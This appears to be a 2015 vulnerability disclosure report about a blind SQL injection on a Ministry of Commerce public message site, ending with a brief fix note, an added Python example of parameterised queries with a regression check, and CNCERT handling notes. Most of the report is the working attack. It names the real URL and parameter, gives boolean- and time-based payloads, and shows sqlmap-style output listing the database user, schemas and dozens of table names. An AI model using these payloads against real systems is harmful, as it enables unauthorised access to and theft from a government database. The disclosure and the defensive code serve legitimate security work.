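2015-07-30: Details reported to the vendor; awaiting vendor handling
2015-07-31: Vendor confirmed; details disclosed to the vendor only
2015-08-10: Details disclosed to core white hats and experts in related fields
2015-08-20: Details disclosed to regular white hats
2015-08-30: Details disclosed to intern white hats
2015-09-14: Details disclosed to the public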
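Boolean-based blind SQL injection on a Ministry of Commerce subsite
SQL injection vulnerability in the Ministry of Commerce public message site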
Public message site: http://gzly.mofcom.gov.cn/website/comment/training/index.jsp
Injection point: http://gzly.mofcom.gov.cn/website/comment/training/index.jsp?p_type=170
Payload:
Place: GET
Parameter: p_type
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: p_type=170' AND 2007=2007 AND 'JxUj'='JxUj

    Type: AND/OR time-based blind
    Title: Oracle AND time-based blind (heavy query)
    Payload: p_type=170' AND 4658=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) AND 'qSOy'='qSOy
---
[22:43:22] [INFO] the back-end DBMS is Oracle
web application technology: JSP
back-end DBMS: Oracle
Proof of vulnerability:
current user: 'MOFDATA'
available databases [7]:
[*] CTXSYS
[*] EXFSYS
[*] MDSYS
[*] MOFDATA
[*] SYS
[*] SYSTEM
[*] WMSYS
[23:08:50] [INFO] retrieved: ARTICLE
[23:09:34] [INFO] retrieved: ARTICLE_ATTACH
[23:10:34] [INFO] retrieved: ARTICLE_CATALOG
[23:11:30] [INFO] retrieved: ARTICLE_CATALOG_LOG
[23:12:12] [INFO] retrieved: ARTICLE_IMAGE
[23:12:57] [INFO] retrieved: ARTICLE_MEMBER_LOG
[23:14:13] [INFO] retrieved: ARTICLE_TOTAL_LOG
[23:15:34] [INFO] retrieved: BBS_ATTACH
[23:16:38] [INFO] retrieved: BBS_CLUB
[23:17:07] [INFO] retrieved: BBS_GROUP
[23:17:42] [INFO] retrieved: BBS_INFO
[23:18:12] [INFO] retrieved: BBS_USER
[23:18:52] [INFO] retrieved: CNCFORUM_REGISTER
[23:20:24] [INFO] retrieved: CODE_AREA
[23:21:09] [INFO] retrieved: CODE_COUN
[23:21:47] [INFO] retrieved: COI_MAIL
[23:22:22] [INFO] retrieved: COMMENT_CATEGORY
[23:23:50] [INFO] retrieved: COMMENT_DEP
[23:24:28] [INFO] retrieved: COMMENT_EDI
[23:25:07] [INFO] retrieved: COMMENT_EN_2002
[23:26:01] [INFO] retrieved: COMMENT_EN_2003
[23:26:24] [INFO] retrieved: COMMENT_EN_2004
[23:26:57] [INFO] retrieved: COMMENT_EN_2005
[23:27:20] [INFO] retrieved: COMMENT_EN_2006
[23:27:50] [INFO] retrieved: COMMENT_EN_2007
[23:28:13] [INFO] retrieved: COMMENT_EN_2008
[23:28:43] [INFO] retrieved: COMMENT_EN_2009
[23:29:13] [INFO] retrieved: COMMENT_EN_2010
[23:30:01] [INFO] retrieved: COMMENT_EN_2011
[23:30:27] [INFO] retrieved: COMMENT_EN_2012
[23:30:59] [INFO] retrieved: COMMENT_FAQ
[23:31:27] [INFO] retrieved: COMMENT_FAQ_2006
[23:32:26] [INFO] retrieved: COMMENT_FAQ_2007
[23:33:07] [INFO] retrieved: COMMENT_FAQ_2008
[23:33:30] [INFO] retrieved: COMMENT_FAQ_2009
[23:33:53] [INFO] retrieved: COMMENT_FAQ_2010
[23:34:32] [INFO] retrieved: COMMENT_FAQ_2011
[23:34:59] [INFO] retrieved: COMMENT_FAQ_2012
[23:35:33] [INFO] retrieved: COMMENT_KEYWORD
[23:36:49] [INFO] retrieved: COMMENT_KW
[23:37:08] [INFO] retrieved: COMMENT_LOCAL_2004
[23:38:23] [INFO] retrieved: COMMENT_LOCAL_2005
[23:38:53] [INFO] retrieved: COMMENT_LOCAL_2006
[23:39:24] [INFO] retrieved: COMMENT_LOCAL_2007
[23:39:52] [INFO] retrieved: COMMENT_LOCAL_2007_BOXILAI
Filter input.
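The remediation above says only to filter input. The following is an added example, not part of the original report: it replays the report's boolean payload against a concatenated query and against a validated, bound query. The table, column and function names and the false-condition probe are constructed for illustration, and sqlite3 stands in for the Oracle back end.

```python
import sqlite3

# Payload quoted in the report, and a constructed always-false twin of it.
TRUE_PROBE = "170' AND 2007=2007 AND 'JxUj'='JxUj"
FALSE_PROBE = "170' AND 2007=2008 AND 'JxUj'='JxUj"

def make_db():
    # Constructed sample data; table and column names are hypothetical.
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE comment_category (p_type TEXT, title TEXT)")
    db.executemany("INSERT INTO comment_category VALUES (?, ?)",
                   [("170", "training"), ("171", "policy")])
    return db

def lookup_concat(db, p_type):
    # Vulnerable pattern: the parameter is spliced into the SQL text, so a
    # quote inside p_type changes the structure of the WHERE clause.
    sql = "SELECT title FROM comment_category WHERE p_type = '" + p_type + "'"
    return [row[0] for row in db.execute(sql)]

def lookup_bound(db, p_type):
    # Hardened: accept only a short run of ASCII digits, then pass the value
    # as a bind variable so the driver never parses it as SQL.
    if not (p_type.isascii() and p_type.isdigit() and len(p_type) <= 9):
        raise ValueError("p_type must be numeric")
    return [row[0] for row in db.execute(
        "SELECT title FROM comment_category WHERE p_type = ?", (p_type,))]

def leaks_boolean(lookup, db):
    # Regression check: a boolean-blind channel exists when the always-true
    # and always-false probes produce distinguishable responses.
    def respond(value):
        try:
            return lookup(db, value)
        except ValueError:
            return "rejected"
    return respond(TRUE_PROBE) != respond(FALSE_PROBE)

if __name__ == "__main__":
    db = make_db()
    print("concatenated query leaks:", leaks_boolean(lookup_concat, db))
    print("bound query leaks:", leaks_boolean(lookup_bound, db))
```

The same `leaks_boolean` check can be kept as a regression test so that a later change back to string concatenation is caught before release.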
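Severity: Medium
Vulnerability rank: 10
Confirmed: 2015-07-31 15:47
CNVD confirmed and reproduced the situation described, and has passed it via CNCERT to the national higher-level information security coordination body, which will coordinate follow-up handling with the organization that manages the website.
None yet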